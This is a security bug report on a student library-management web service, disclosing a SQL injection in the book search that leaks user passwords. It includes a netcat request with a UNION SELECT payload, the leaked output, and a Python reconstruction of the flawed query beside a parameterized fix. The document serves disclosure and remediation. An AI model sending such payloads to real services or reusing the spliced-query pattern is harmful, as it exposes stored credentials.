dazzling-sky / COMP4111-project

COMP4111 project - RESTful Web Service for Library Book Management
https://course.cse.ust.hk/comp4111/project.html

[Security] Dumping user password database with SQL injection in book lookup #30

Open STommydx opened 4 years ago

STommydx commented 4 years ago

Describe the bug

User passwords can be dumped through SQL injection in the book lookup.

To Reproduce

  1. Login as usual
  2. Send the following request with netcat in a terminal.
    echo -e "GET /BookManagementService/books?token=kzm6314&title=\"\tUNION\tSELECT\t0,Name,Password,0,0,0\tFROM\tusers\tWHERE\tName\tLIKE\" HTTP/1.1\r\n" | nc localhost 8080

    Change kzm6314 to your login token.

Expected behavior

204 No Content

What actually happens

200 OK, returning the usernames and passwords as Author and Publisher respectively:

{
    "FoundBooks": 10000,
    "Results": [
        {
            "Title": "user00001",
            "Author": "pass00001",
            "Publisher": "0",
            "Year": 0
        },
        {
            "Title": "user00002",
            "Author": "pass00002",
            "Publisher": "0",
            "Year": 0
        },
        "(many more lines truncated....)"
    ]
}
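As an added example (not the project's own code), the following Python/sqlite3 script reconstructs the flaw the report describes and places the parameterized lookup that closes it beside it. Everything about the schema is an assumption: a `books` table with six columns (the report's payload supplies six values, so the real table presumably has six) and a `users` table with `Name` and `Password`. The report's payload uses double quotes, which suggests the service quoted its LIKE pattern with double quotes; sqlite3 reliably uses single quotes for string literals, so the same payload is carried here with single quotes. The tab separators are kept as in the report, since SQL treats tabs as whitespace.

```python
import sqlite3

# Constructed schema: the column layout of books is a guess that matches the
# six-value UNION in the report; the user rows mirror the leaked output.
SCHEMA = """
CREATE TABLE books (id INTEGER, title TEXT, author TEXT, publisher TEXT,
                    year INTEGER, available INTEGER);
CREATE TABLE users (Name TEXT, Password TEXT);
INSERT INTO books VALUES (1, 'Dune', 'Frank Herbert', 'Chilton', 1965, 1);
INSERT INTO users VALUES ('user00001', 'pass00001'), ('user00002', 'pass00002');
"""

# The report's title value, with its quote character adapted to single quotes.
REPORT_PAYLOAD = "'\tUNION\tSELECT\t0,Name,Password,0,0,0\tFROM\tusers\tWHERE\tName\tLIKE'"


def open_db():
    """Fresh in-memory database loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, title):
    """Hypothetical reconstruction of the flawed lookup: the title is spliced
    straight into the SQL text, so a quote in it ends the pattern and the rest
    becomes part of the statement."""
    sql = "SELECT * FROM books WHERE title LIKE '%" + title + "%'"
    return conn.execute(sql).fetchall()


def escape_like(term):
    """Neutralise LIKE metacharacters so a search term such as '100%' matches
    literally instead of everything (parameters stop injection, not wildcards)."""
    return term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def lookup_parameterized(conn, title):
    """Hardened lookup: the pattern travels as a bound parameter, so whatever the
    client sends is compared as data and never parsed as SQL."""
    sql = "SELECT * FROM books WHERE title LIKE ? ESCAPE '\\'"
    return conn.execute(sql, ("%" + escape_like(title) + "%",)).fetchall()


def leaked_credentials(rows):
    """Return the (Name, Password) pairs that a result set exposes in the
    title/author columns; useful as an assertion in a regression test."""
    return {(row[1], row[2]) for row in rows if str(row[1]).startswith("user")}


if __name__ == "__main__":
    db = open_db()
    print("vulnerable:", leaked_credentials(lookup_vulnerable(db, REPORT_PAYLOAD)))
    print("parameterized:", lookup_parameterized(db, REPORT_PAYLOAD))
    print("normal search:", lookup_parameterized(db, "dune"))
```

Run as a script, the vulnerable lookup returns the two user rows dressed up as books while the parameterized lookup returns nothing for the same input and still finds "Dune" for an ordinary search. The `ESCAPE` clause is a separate, smaller fix: without it a bound `%` or `_` in the search term still acts as a wildcard, which is a data-exposure issue of its own even once injection is gone.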